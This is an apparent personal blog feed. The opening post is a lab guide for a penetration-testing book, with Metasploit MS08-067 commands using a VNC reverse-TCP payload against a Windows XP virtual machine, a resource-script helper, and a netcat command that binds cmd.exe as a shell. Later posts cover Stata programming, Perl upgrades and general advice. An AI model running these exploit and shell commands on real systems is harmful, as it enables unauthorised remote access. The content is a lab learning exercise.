use exploit/windows/smb/ms08_067_netapi<br />
set payload windows/vncinject/reverse_tcp<br />
set RHOST 192..... (victim machine, i.e. win xp sp2 machine, ip address)<br />
set LHOST 192..... (attacker, i.e. backtrack linux machine, ipaddress)<br />
exploit<br />
<br />
Now you have access to the victim machine. But in your terminal, there is no prompt. Just go to the terminal and hit enter and you will get your msf > prompt back. There are no instructions in the book on how to stop the exploit, so I just type <i>quit</i> at the prompt and then relaunch msfconsole - that seems to do the trick.<br />
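<br />
Since quitting and relaunching msfconsole means retyping the same commands against your lab guest, it may be handy to keep them in a resource file and load it with msfconsole -r. A minimal sketch; write_rc is a made-up helper name, and the two IP addresses are whatever your own guests use:<br />

```shell
# Hypothetical helper: print the console commands for the lab exercise above
# as a Metasploit resource script.
write_rc() {
    rhost=$1   # IP address of the Windows XP guest (the target in your lab)
    lhost=$2   # IP address of the BackTrack guest
    cat <<EOF
use exploit/windows/smb/ms08_067_netapi
set payload windows/vncinject/reverse_tcp
set RHOST $rhost
set LHOST $lhost
exploit
EOF
}

# Usage: write_rc <xp_guest_ip> <backtrack_ip> > xp.rc
#        msfconsole -r xp.rc
```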
<br />
UPDATE 6: I'm trying to use Autopwn automation on Fast-track Web in Backtrack. When I select Autopwn automation from the web browser, the browser displays only HTML instead of a menu. I thought that the problem was with Java not being installed in Firefox, so I followed <a href="http://www.backtrack-linux.org/wiki/index.php/Java_Install" target="_blank">these instructions</a> to install/update the Java plugin in Firefox. That didn't solve the problem. Then I came across <a href="http://www.linux-backtrack.com/2012/03/fix-fast-track-after-metasploit-update-autopwn/" target="_blank">this post</a>, which states that autopwn won't work after updating Metasploit, because the update removes the db_autopwn file. So I followed <a href="http://www.linux-backtrack.com/2012/03/fix-fast-track-after-metasploit-update-autopwn/" target="_blank">those instructions</a> and downloaded a new db_autopwn file from the link that is available <a href="http://www.backtrack-linux.org/forums/showthread.php?t=48407" target="_blank">here</a>, placed it in /opt/metasploit/msf3/plugins, and then edited <b>autopwn.py</b> (you can find the directory using the command <i>find / -name autopwn.py</i>). I rebooted BT5 and still it didn't fix the issue. I then updated Fast Track by loading the Fast Track Interactive application from the kstart dragon and selecting update (1 on the menu). I even updated Firefox to the latest version. Still, Autopwn Automation doesn't work on the web GUI. I'll give up for now and just use Fast Track Interactive.<br />
<br />
UPDATE 7: Ok, forget Firefox. Autopwn Automation works fine if you access it using Konqueror. <br />
<br />
UPDATE 8: In case you want to transfer files between the host and the guest, you can do the following: on the host machine, click "Devices" -> "Shared Folders" -> "Transient Folders" -> click the green "Add Shared Folders (ins)" icon -> In folder path click the down arrow, select "other" and browse to the folder you want to select, then click "ok". <a href="http://www.techgaun.com/2010/11/accessing-shared-folders-of-host-system.html" target="_blank">Then in a Terminal in the guest, you can type</a>:<br />
<br />
mount -t vboxsf <i>name_of_the_folder_you_shared</i> /mnt<br />
<br />
<i>name_of_the_folder_you_shared </i>is the name of the folder that you shared as it appears under "Transient Folders" in the Shared Folders folder of the Settings box. (The command I used is:<br />
<br />
mount -t vboxsf shareme /mnt<br />
<br />
because I shared a folder called "shareme") <br />
<br />
That folder will now appear in the /mnt directory<br />
<br />
UPDATE 9: Getting Webgoat running on BackTrack Linux was a huge pain. <a href="http://mimmoo.wordpress.com/2011/06/22/how-to-install-webgoat-on-backtrack-5/" target="_blank">This link helped,</a> and so did <a href="https://code.google.com/p/webgoat/wiki/FAQ" target="_blank">this link</a>. Here is what I did:<br />
<br />
1. Open up a terminal, and update everything in sight:<br />
apt-get update<br />
apt-get upgrade<br />
<br />
2. If you don't have the Java stuff installed, then install it. While you're at it, install p7zip:<br />
apt-get install p7zip<br />
apt-get install openjdk-6-jre openjdk-6-jdk<br />
<br />
3. Extract the files, then move them, and make the .sh file executable:<br />
p7zip -d OWASP_Standard WebGoat-5.3_RC1.7z<br />
mkdir /pentest/web/webgoat<br />
mv WebGoat-5.3_RC1/* /pentest/web/webgoat/<br />
chmod +x /pentest/web/webgoat/webgoat.sh <br />
<br />
4. At this point, you need to rename a file:<br />
cd /pentest/web/webgoat/tomcat/webapps<br />
mv webgoat.war WebGoat.war<br />
cd /pentest/web/webgoat<br />
<br />
(note that you need to be in the /pentest/web/webgoat directory for webgoat to run properly; this is because of the way the paths are defined in the webgoat.sh file)<br />
<br />
5. Now start webgoat:<br />
/pentest/web/webgoat/webgoat.sh start80 (or start8080)<br />
<br />
6. open up a browser and go to: http://127.0.0.1/WebGoat/attack (or http://127.0.0.1:8080/WebGoat/attack) and log in with:<br />
user: guest<br />
password: guest<br />
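<br />
Because webgoat.sh only works when it is started from its own directory (see the note in step 4), a tiny wrapper can take care of the cd for you. This is just a sketch; start_webgoat and WEBGOAT_DIR are names I made up, and the default directory is the one used in the steps above:<br />

```shell
# Hypothetical wrapper: always launch webgoat.sh from inside its own directory.
# $1 is the mode passed to webgoat.sh (start80 or start8080); default is start8080.
start_webgoat() {
    dir=${WEBGOAT_DIR:-/pentest/web/webgoat}
    mode=${1:-start8080}
    # The subshell keeps your own working directory unchanged.
    ( cd "$dir" && ./webgoat.sh "$mode" )
}

# Usage: start_webgoat start80
```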
<br />
UPDATE #10: There is a mistake on page 133, in the section on using Netcat:<br />
<br />
meterpreter > nc -L -p 5777 -e cmd.exe<br />
<br />
should be instead:<br />
<br />
meterpreter > execute -f "nc.exe -L -p 5777 -e cmd.exe"<br />
<br />
More hints and advice to come, hopefully. </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-74083549684606727722012-05-14T23:55:00.002-07:002012-05-17T21:48:16.510-07:00An easy way to conduct f-tests on regression coefficients<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to conduct a joint test for significance on the coefficients of variables that have been expanded in a regression using the xi command. For example, suppose you ran the command:<br />
<br />
xi: svy, subpop(rural) : reg y i.lfs i.roofmat var5 var6 var7 var8<br />
<br />
Doing an f-test manually on each group of expanded variables would involve typing (or copying and pasting) the expanded variable names, something like:<br />
<br />
test _Ilfs_2 _Ilfs_3 _Ilfs_5 _Ilfs_6 _Ilfs_10<br />
test _Iroofmat_2 _Iroofmat_5 _Iroofmat_6 _Iroofmat_7 _Iroofmat_8<br />
<br />
As you can see, the numbers on the xi expanded variables do not necessarily increase by one. And this can be cumbersome to type out, or copy and paste, especially if you have many such categorical variables. I'm sure someone has solved this already, but I couldn't find a solution through a web search, so I made my own.<br />
<br />
The following program, which you would run after running the reg command, will automatically run f-tests on each group of xi expanded categorical variables. So you would use this program as follows:<br />
<br />
xi: svy, subpop(rural) : reg y i.lfs i.roofmat var5 var6 var7 var8<br />
easyftest <br />
<br />
To use this, just copy the program below and save it as an .ado file in your personal ado directory (type sysdir in Stata to see where that is). The filename should be "easyftest.ado". Let me know if you have any trouble with it. Good luck!<br />
<br />
program define easyftest<br />
<br />
local xivars "`_dta[__xi__Vars__To__Drop__]:'"<br />
local word1 : word 1 of `xivars'<br />
local pattern = regexr("`word1'","_[0-9]+$","_")<br />
// di "word1 = `word1'"<br />
// di "pattern = `pattern'"<br />
local ftestvars1 "`word1'"<br />
local count = 0<br />
local ftestcount 1<br />
foreach var of local xivars { <br />
local count = `count' + 1<br />
if (`count' != 1) {<br />
local w : word `count' of `xivars'<br />
// di "w: `w'"<br />
// check to see whether the next variable is to be included in this list of f-test variables<br />
if (regexm("`w'","^`pattern'[0-9]+$")) { // there is a match - add this to this list of ftest variables<br />
// di "pattern match!"<br />
local ftestvars`ftestcount' "`ftestvars`ftestcount'' `w'"<br />
// di "ftestvars`ftestcount' : `ftestvars`ftestcount''"<br />
} <br />
else { // no match, create a new list of f-test variables, add this variable to it as the first element, and replace the pattern<br />
local ftestcount = `ftestcount' + 1<br />
local ftestvars`ftestcount' "`w'"<br />
local pattern = regexr("`w'","_[0-9]+$","_")<br />
}<br />
}<br />
}<br />
<br />
forv k = 1/`ftestcount' { // Do all the ftest<br />
// di "ftestvars`k' : `ftestvars`k''"<br />
// return local ftestvars`k' `ftestvars`k''<br />
test `ftestvars`k''<br />
}<br />
// return scalar N = `ftestcount'<br />
<br />
end</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-3663042474269513642012-05-14T10:33:00.001-07:002012-05-14T21:09:43.381-07:00Stata tip: Plotting the coefficients estimated from a regression (bar graph in stata)<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to make a bar chart/graph/plot of the coefficients (betas) that are returned in the ereturn list from the regression (reg) command. You might want to do this to visualize the relative weight each variable carries in your estimation. For example, suppose you want to predict consumption based on ownership of a car, a satellite dish and a generator, and on household size (e.g. if you are working on a Proxy Means Test (PMT) formula). Assume the first three are dummy/binary indicators. <br />
<br />
The coefficients estimated from the regression will give you an indication of how important each factor is. For example, if the coefficients are, respectively, +5, +1, +3 and -15, then you know that household size dominates the calculation: one additional member reduces predicted consumption by 15, which is more than owning all three assets increases it (5 + 1 + 3 = 9).<br />
<br />
Here is some code for a program (.ado file) that you can call after running the reg command. It creates a dataset with one variable for each variable in the regression (including the constant) and a single observation holding the coefficients (see more text after the code below. Yes, I know this code is horribly inefficient; I just wanted something quick, which means I got something quick and dirty):<br />
<br />
program define dataset_coefficients<br /> <br /> syntax , Filename(string) [Separator(string)]<br /> version 9.1<br /> if ("`separator'" == "") { <br /> local separator ","<br /> }<br /> // Get the names of the variables to write out. Need to change " o." to " " for making name for the macro to hold the variable labels<br /> local varnames : coln e(b)<br /> local coefs ""<br /> foreach varn of local varnames {<br /> local coef = _coef[`varn']<br /> local coefs "`coefs' `coef'"<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> local varlab_`varn1' : variable label `varn1'<br /> }<br /> else {<br /> local varlab_constant "constant"<br /> }<br /> }<br /> preserve<br /> drop *<br /> // Generate the new variable names, and apply the labels<br /> local variablenamestoplot ""<br /> foreach varn of local varnames {<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> gen `varn1' = .<br /> label var `varn1' `"`varlab_`varn1''"'<br /> local variablenamestoplot "`variablenamestoplot' `varn1'"<br /> }<br /> else {<br /> gen constant = .<br /> label var constant "constant"<br /> local variablenamestoplot "`variablenamestoplot' `constant'"<br /> }<br /> }<br /> // Apply the values to the variables as observations<br /> set obs 1<br /> local count = 0<br /> foreach varn of local varnames {<br /> local count = `count' + 1<br /> local coef1 : word `count' of `coefs'<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> // constant? <br /> replace `varn1' = `coef1' in 1<br /> }<br /> else {<br /> replace constant = `coef1' in 1<br /> }<br /> }<br /> cap drop __*<br /> // global variablenamestoplot "`variablenamestoplot'"<br /> // char [variablenamestoplot] "`variablenamestoplot'"<br /> notes : `variablenamestoplot'<br /> save "`filename'" , replace<br /> restore<br />end program<br />
<br />
After calling this (for example: dataset_coefficients, filename(plotme.dta)), you can simply load the dataset and graph/chart/plot
the coefficients on a bar graph using the following commands:<br />
<br />
use plotme.dta, clear<br />
// get the list of variables. I can't just use * because I get some error like __00000 not found. And I don't want to plot the constant.<br />
local listofvars ""<br />
foreach var of varlist * {<br /> if ("`var'" != "constant") {<br /> local listofvars "`listofvars' `var'"<br /> }<br />
}<br />
graph bar (asis) `listofvars', blabel(name, pos(outside) orient(vertical)) legend(off) title("Coefficients ")<br />
graph export coef.png, replace <br />
<br />
Let me know how this works for you.</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com3tag:blogger.com,1999:blog-2722671667390463266.post-59057699479704559742012-05-08T01:38:00.003-07:002012-05-09T00:01:42.195-07:00Constructing the regression equation with actual coefficients/betas from the e(b) matrix from the ereturn list after running reg with xi and svy<div dir="ltr" style="text-align: left;" trbidi="on">
I hope that the title of this post hit all the keywords. So here was
my dilemma: after running the reg command to estimate regression
coefficients (betas), I wanted to apply this equation to a different set
of data without having to copy and paste the actual beta hats. <br />
<br />
So I have a dataset, hhsurvey.dta, and I estimate the following regression:<br />
<br />
y = b0 + b1*X1 + b2*X2 + ... + bn*Xn<br />
<br />
and I get<br />
<br />
y_hat<br />
b0_hat<br />
b1_hat<br />
.<br />
.<br />
.<br />
bn_hat<br />
<br />
With
this, I want to take a different dataset, applicants.dta, with the same
variables (but of course different values for these variables), and I
want to predict y for the observations in applicants.dta:<br />
<br />
y_hat_2 = b0_hat + b1_hat*X1 + b2_hat*X2 + ... + bn_hat*Xn<br />
<br />
I
could copy and paste the beta_hats from the regression output, but
this is painful to do even once (I am using many variables, including
categorical variables). And I suspect I will have
to do this many times. My solution was to take the output of the e(b)
matrix, which has all the information necessary. After running the
regression command:<br />
<br />
<br />
xi: svy: reg y car i.roofmaterial i.fencematerial i.hhsize ...<br />
<br />
<br />
you will find some great information stored in the ereturn value "e(b)"<br />
<br />
<br />
matrix list e(b)<br />
<br />
<br />
Anyway, to make an equation with the regression variables and beta_hats, try the following:<br />
<br />
local varnames_rural : coln e(b) // Stores the column names (i.e. variable names) in a local macro. <br />
local equation_rural "" // Will put the equation in this local macro<br />
foreach varn of local varnames_rural { // Loop through all the column (variable) names<br />
local coef = _coef[`varn'] // This is the beta_hat corresponding to the variable name (inc. categorical vars)<br />
if ("`varn'" != "_cons") { // The constant in the regression shouldn't be multiplied by anything<br />
if (`coef' < 0) { // we want to put a "+" before positive coefficients, but not before negative coefficients<br />
local equation_rural "`equation_rural' `coef'*`varn'"<br />
}<br />
else {<br />
local equation_rural "`equation_rural' + `coef'*`varn'"<br />
}<br />
}<br />
else {<br />
if (`coef' < 0) {<br />
local equation_rural "`equation_rural' `coef'"<br />
}<br />
else {<br />
local equation_rural "`equation_rural' + `coef'"<br />
}<br />
}<br />
} <br />
di "equation: `equation_rural'" <br />
<br />
How about if you want to save this to a file, so that you can load it into a macro in another do file? Try this:<br />
<br />
tempname fh<br />
file open `fh' using "myfile.txt", w replace all<br />
file write `fh' "`equation_rural'" _n<br />
file close `fh'<br />
<br />
Now, in your new do file that uses the applicants.dta dataset, with the same variable names, you can use the following code to calculate y_hat_2 for the applicants.dta dataset:<br />
<br />
// load the equation<br />
tempname fh2<br />
file open `fh2' using "myfile.txt", r t <br />
file read `fh2' line1<br />
file close `fh2'<br />
<br />
di `"line1 = `line1'"'<br />
<br />
gen y_hat_2 = `line1'<br />
<br />
This should work - leave a comment if it doesn't. Good luck!<br />
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-74808413730008865522012-04-30T22:22:00.000-07:002012-10-03T05:45:28.078-07:00Upgrading Perl from 5.12 to 5.14; installing YAML; fixing problem of not being able to install CPAN modules<div dir="ltr" style="text-align: left;" trbidi="on">
I don't know what happened since the last post, but I was no longer able to install CPAN modules on my MacBook Pro running Mac OS X Snow Leopard. CPAN didn't like that YAML was not installed, and I wanted to upgrade my Perl installation from 5.12 to 5.14. Finally, I figured all this out. Here is what I did:<br />
<br />
1. Install Perl 5.14. Instructions are <a href="http://docs.activestate.com/activeperl/5.14/install.html#installing%20activeperl%20on%20mac%20os%20x%20%28x86%29" target="_blank">here</a>. I downloaded the package from <a href="http://www.activestate.com/activeperl/downloads" target="_blank">http://www.activestate.com/activeperl/downloads</a>, opened the installer and installed the package. This part is easy and straightforward.<br />
<br />
After this step, however, my Mac was still using Perl 5.12 rather than the new version. You can check which version your Mac is using by opening a terminal and typing:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">perl -v</span><br />
<br />
So you need to add the location of the new Perl version to your PATH environment variable.<br />
<br />
2. Instructions for adding the new Perl version to your Mac's PATH are <a href="http://docs.activestate.com/activeperl/5.14/install.html#installing%20activeperl%20on%20mac%20os%20x%20%28x86%29" target="_blank">here</a>. More instructions on how to edit the path file (the ".profile" file in your user home directory) are available at <a href="http://www.tech-recipes.com/rx/2621/os_x_change_path_environment_variable/" target="_blank">http://www.tech-recipes.com/rx/2621/os_x_change_path_environment_variable/</a> and <a href="http://www.tech-recipes.com/rx/2618/os_x_easily_edit_hidden_configuration_files_with_textedit/" target="_blank">http://www.tech-recipes.com/rx/2618/os_x_easily_edit_hidden_configuration_files_with_textedit/</a>. Doing this tells your Mac where to look for Perl when you type the perl command at the command prompt.<br />
<br />
Your .profile file will be located in your "user home directory." For me, this is /Users/shafique. For you it will be /Users/&lt;whatever your username is on your computer&gt;. To check what is in your PATH environment variable, in the terminal window type:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">env</span><br />
<br />
or<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">echo $PATH</span><br />
<br />
Now to add the new path to my path variable, I edited the .profile file using a text editor:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">open ~/.profile</span><br />
<br />
Go to the Text Editor, and add the following lines at the end of the text file that the editor just opened:<br />
<br />
<pre><span style="font-family: "Courier New",Courier,monospace;">PATH=/usr/local/ActivePerl-5.14/bin:$PATH
PATH=/usr/local/ActivePerl-5.14/site/bin:$PATH
export PATH</span></pre>
Save and close the .profile file. Then go back to your terminal and type:<br />
<br />
<code>. ./.profile
echo $PATH</code><br />
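<br />
Yes, you will type out all three dots on the first line: the first dot (followed by a space) tells the shell to read the file, and ./.profile is the file itself, so run this from your home directory. This adds the new Perl path to your environment PATH variable. Now you should be all set. To check which Perl version you are now running, type:<br />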
<br />
<span style="font-family: "Courier New",Courier,monospace;">perl -v</span><br />
<br />
and it should show that you are running version 5.14. If not, check your PATH variable:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">env</span><br />
<br />
or<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">echo $PATH</span><br />
<br />
If it doesn't show that the new Perl version directory has been added to your PATH variable, then... well I don't know what to do. <br />
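<br />
One thing to watch for: the PATH lines above prepend the same directories again every time .profile is read, so PATH can fill up with duplicates. A small sketch of an alternative you could put in .profile instead; path_prepend is a hypothetical helper name, and the two directories are the ActivePerl ones from this post:<br />

```shell
#!/bin/sh
# Prepend a directory to PATH only if it is not already listed.
# path_prepend is a hypothetical helper, not a standard shell command.
path_prepend() {
    case ":$PATH:" in
        *":$1:"*) ;;              # already present: do nothing
        *) PATH="$1:$PATH" ;;     # otherwise put it at the front
    esac
}

path_prepend /usr/local/ActivePerl-5.14/bin
path_prepend /usr/local/ActivePerl-5.14/site/bin
export PATH
```

Reading the file a second time then leaves PATH unchanged, and echo $PATH shows each ActivePerl directory only once.<br />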
<br />
3. Go ahead and install YAML. In your terminal window, type:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">sudo perl -MCPAN -e 'install +YAML'</span><br />
<br />
and then enter your password when the terminal asks for it. <br />
<br />
4. Go ahead and upgrade CPAN. In your terminal window, type:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo perl -MCPAN -e 'install CPAN'</span><br />
<br />
5. <a href="http://docs.activestate.com/activeperl/5.14/install.html#uninstalling%20activeperl%20on%20os%20x" target="_blank">Uninstall</a> previous versions of Perl:<br />
<br />
<pre>sudo /usr/local/ActivePerl-5.14/bin/ap-uninstall</pre>
<br />
6. Remove all symbolic links to previous versions of perl in the directories listed in your $PATH variable and replace them with symbolic links to the new version. Start by finding out which paths may have outdated links:<br />
<br />
echo $PATH<br />
<br />
Here is what I had to do:<br />
<span style="font-family: "Courier New",Courier,monospace;"><br /></span>
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5.12</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /opt/local/bin/perl5.12.4</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo rm /usr/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /usr/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /opt/local/bin/perl</span><br />
<span style="font-family: "Courier New",Courier,monospace;">sudo ln -s /usr/local/ActivePerl-5.14/bin/perl /usr/local/perl</span><br />
<br />
If you don't do this, then your editor (I'm using Komodo Edit) might use the wrong @INC variable, which could cause you problems - e.g. it might think you don't have a cpan module that you actually have installed.<br />
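<br />
The rm and ln -s pairs above can be folded into one helper that replaces an old symbolic link in a single step. This is a cautious sketch, not exactly what I ran: relink is a hypothetical name, and it deliberately refuses to touch anything that is a real file rather than a symlink, since some of these paths may hold an actual perl binary.<br />

```shell
#!/bin/sh
# Hypothetical helper: point link_path at target, replacing an old symlink
# but refusing to overwrite a real file or directory.
relink() {
    target="$1"
    link_path="$2"
    if [ -e "$link_path" ] && [ ! -L "$link_path" ]; then
        echo "$link_path is a real file, not a symlink; leaving it alone" >&2
        return 1
    fi
    # -s: symbolic link, -f: replace an existing link, -n: do not follow it
    ln -sfn "$target" "$link_path"
}

# Example (needs root for system directories):
#   relink /usr/local/ActivePerl-5.14/bin/perl /opt/local/bin/perl
```

If relink reports a real file, you have to decide yourself whether removing it, as I did above, is what you want.<br />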
<br />
You should be all set now. You should be able to install Perl modules without any problems. <br />
<br />
Good luck!<br />
<br />
UPDATE (03 Oct 2012): If you're using MacPorts, you can just use the following command:<br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">sudo port install perl5 +perl5_14</span><br />
<br />
But then when you install CPAN modules, you have to use MacPorts to install them.<br />
<br /></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com1tag:blogger.com,1999:blog-2722671667390463266.post-38434859453006472622012-04-07T14:37:00.002-07:002012-05-14T21:19:15.872-07:00Trouble installing perl CPAN Modules on Mac OS X<div dir="ltr" style="text-align: left;" trbidi="on">
I recently ran into problems trying to install perl CPAN modules. I did the following keyword searches to find answers:<br />
<br />
mac won't install CPAN modules<br />
<br />
Finally, I decided to upgrade the perl installation on my machine from 5.8 to 5.12. This fixed everything - I can now install perl modules using CPAN without problems. Here is how I did it:<br />
<br />
(ref: http://stackoverflow.com/questions/3942520/how-do-i-upgrade-my-macports-perl-installation. And note that I was using macports to do the installation)<br />
<br />
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port uninstall </span><span class="pun">-</span><span class="pln">f perl5</span><span class="pun">.</span><span class="lit">8</span></code></pre>
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port install perl5 </span><span class="pun">+</span><span class="pln">perl5_12</span></code></pre>
<pre class="lang-perl prettyprint"><code><span class="pln">sudo port -f activate perl5.12 </span></code></pre>
You can check the installation by typing:<br />
<br />
perl -v <br />
<br />
So far, it works well.<br />
<br />
Now, I want to be able to pull content (text) from PDFs. I have come across the following modules:<br />
<br />
(ref: http://www.perlmonks.org/?node_id=634794, http://stackoverflow.com/questions/5977969/how-to-parse-pdf-files-in-perl)<br />
<br />
PDF::Parse<br />
PDF::API2<br />
<a href="http://search.cpan.org/perldoc?PDF">PDF</a> <br />
<br />
I take it that these produce XML from the PDF content, and then one can parse the XML using the following modules:<br />
<br />
(ref: http://stackoverflow.com/questions/5977969/how-to-parse-pdf-files-in-perl) <br />
<br />
<a href="http://search.cpan.org/perldoc?XML%3a%3aTwig" rel="nofollow">XML::Twig</a><br />
XML::Simple<br />
<br />
I haven't started pulling PDF content yet though. I think I will just use pdftohtml, like the above link says:<br />
<br />
sudo port install pdftohtml<br />
<br />
(I could also try xpdf)<br />
</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-21866137553153803542012-02-17T04:38:00.000-08:002012-02-17T05:11:43.228-08:00Stata Tutorial 2 (A simple do file and cross tabulation)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.youtube.com/watch?v=gKVi3lKe33U" target="_blank">...is now up! Click here to see the youtube video. </a><br />
<br />
Please do leave comments. Cheers. </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-59529824843535473492012-02-16T23:58:00.001-08:002012-06-22T13:08:36.895-07:00Stata Tutorial 1 (Introduction to using Stata)<div dir="ltr" style="text-align: left;" trbidi="on">
<a href="http://www.youtube.com/watch?v=vChrAFZ3r6E" target="_blank">...is now up! Click here to view.</a> And please do post comments to let me know what you think.<br />
<br />
UPDATE: The font is small in this tutorial - I have made it bigger for tutorial 2. But you can access a google doc with all the commands and output by clicking the following link:<br />
<br />
<a href="https://docs.google.com/document/pub?id=1IjVOm4-Bvmfm69fgZ7oxvZEYBvcZAgAX2XdiE3WQRbE" target="_blank"> https://docs.google.com/document/pub?id=1IjVOm4-Bvmfm69fgZ7oxvZEYBvcZAgAX2XdiE3WQRbE</a> </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-56960731762663084932011-12-17T22:05:00.000-08:002011-12-18T01:03:42.863-08:00Some advice for working with a web developer to develop a website<div dir="ltr" style="text-align: left;" trbidi="on">
I am looking to have a website developed. I can actually program in PHP and have developed a not-so-simple social website myself, but I still haven't programmed with objects and I'm not that efficient (and I can't make things look good). Since I don't have a comparative advantage in developing websites, I'm working with a firm to do that for me. I've spoken to a couple of firms that design and develop websites, and received a couple of quotes. I asked my computer whiz colleague for advice on dealing with website development firms (I sent him one of the quotes that I received), and I'm pasting his advice below.<br />
<br />
---<br />
Looks great indeed. A few points:<br />
<br />
-There is no description of your project. This means they
eyeballed the cost, and have large safety margins. It's not a
complex project, so it's not a major downside to eyeball the project
as a whole instead of making an estimation by item.<br />
<br />
-They seem responsive, or at least tell you they will be. That
is an important part. Communication is always key to a good working
relationship.<br />
<br />
-They offer two rate options: hourly and flat, which is a good
signal. If it were me, I would go for hourly and guide them through
the project: for sure the project will look more like what you want
it, and it should end up cheaper (see my first point). But perhaps
it does not matter enough to you, and you think they have better
ideas than you on how the website should be. In that case, go with
fixed rate.<br />
<br />
-If you want to go hourly, I would recommend you get the
functional analysis before the actual coding happens: <br />
<br />
-graphical appearance (actual work. Do you have a logo?)<br />
-workflow of the data process (web page by web page), <br />
-schematic drawing of each interface, <br />
-data dictionary. <br />
<br />
Only then should you approve the start of the coding. They won't like so
much paperwork, but it is a good practice and protects everyone. I
would also suggest doing as much work yourself as you can: draw
schematic interfaces on your word processor and share with the
programmer before he starts with the paperwork. The more you guide,
the better (and cheaper) the project will be.<br />
<br />
The alternative to guiding them with the hourly rate is to let them
propose their stuff with the fixed rate. Do it if you are not risk
averse, both on quality and time to completion. You can get
surprises, both good and bad. Just a word of caution: there is also
an outside risk of having a project absolutely not what you wanted
and they ask for more money, arguing it was not in the contract. If
the functional analysis is not complete, all bad things can happen.
The devil is always in the details, and turnkey projects are not
always as turnkey as we hope they will be...<br />
<br />
Also, remember that coding is only a small part of the project.
Calculate <br />
<br />
1/3 analysis and preparation<br />
1/3 coding<br />
1/3 implementation: Adjustments and changes, debugging, actual
setup of the server ready for real data, etc. <br />
<br />
Also, the work is not over even on the launch day. Expect problems,
adjustments, etc... The more analysis you do, the easier the
implementation. If they tell you 6 weeks, expect 3 times as much for
your real launch day. No kidding. Get ready: it will take 3 times as
much time as they say it will, always. <br />
<br />
You should ask for the alpha version: the first version that allows
you to see how the project works, with most of the interfaces ready,
and then there is the beta version, the first complete version. Find
friends and family to play around with your beta version and try to crash
the program: the more people who try the beta version, the better. <br />
<br />
Analogous to what you are about to do is making renovations in your
home. Talk to home owners about their experience renovating, and you
hear horror stories. It's the same kind of problems in
renovation and hiring a programmer: you can expect to handle
(sometimes frustrating) issues on a regular basis for this project,
turnkey or not. Fortunately, it's a small project, but even then
problems arise! There are financial risks involved, for the value of
what you put in. Asking a contractor to do work for you is never a
fully safe bet. Worst case scenario is you lose all of what you put
in, and it happens in real life. Watch your back :)<br />
<br />
But also sometimes you find the golden helper. No problems, goes out
of his way to help, and you get what you want and on time. Rare, but
they exist. Like in renovation: it's not always a catastrophe! It
depends a lot on the rapport you will establish with the guys
actually doing the work. <br />
<br />
Finally, think servicing on the longer run. You will probably not
want to do it yourself. Budget a minimum of 15% per year,
(unexpected problems, updates of platform software creating problems
with your code, crashes etc...) excluding expansion of functions,
and also excluding amortizing for the next version of the project.
Expect a complete rewrite from scratch in 2 to 5 years, depending on
the speed at which your business changes, and the quality of the
initial work.<br />
<br />
<br />
Good luck!<br />
--- <br />
<br />
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-37535558265723076532011-12-17T21:54:00.000-08:002011-12-18T01:15:19.293-08:00Computer buying advice<div dir="ltr" style="text-align: left;" trbidi="on">
Recently, my MacBook Pro, which I purchased in February of 2008, sort of died. The computer works, but the Nvidia video card has died. Apple has extended the warranty for this, but I'm stuck in Central Asia until March, so won't be able to get it to an Apple authorized repair facility. So I have to look for a new computer.<br />
<br />
I'm wondering whether to forgo getting another Mac and go back to using a PC. I'm not a fan of Windows, and a colleague of mine has recommended using Ubuntu Linux. He's a computer whiz, so can handle a non-standard operating system. I'm not so sure that I can. Anyways, that will be another post.<br />
<br />
I asked said colleague for advice on buying a computer, and I'm pasting below what he wrote. Now, computer buying advice is far from timeless. And the advice you should get will depend on what you need the computer for. I will be using STATA (heavily computationally intensive) and watching movies (need a good graphics card). My partner will want to do lots of document editing, and will want a big screen. It will stay in the home, so portability and battery life are not priorities. <br />
<br />
---<br />
I would indeed get a Sony Vaio. I currently use a rugged IBM
lenovo that was lent to me, I appreciate its 5 hours of battery in
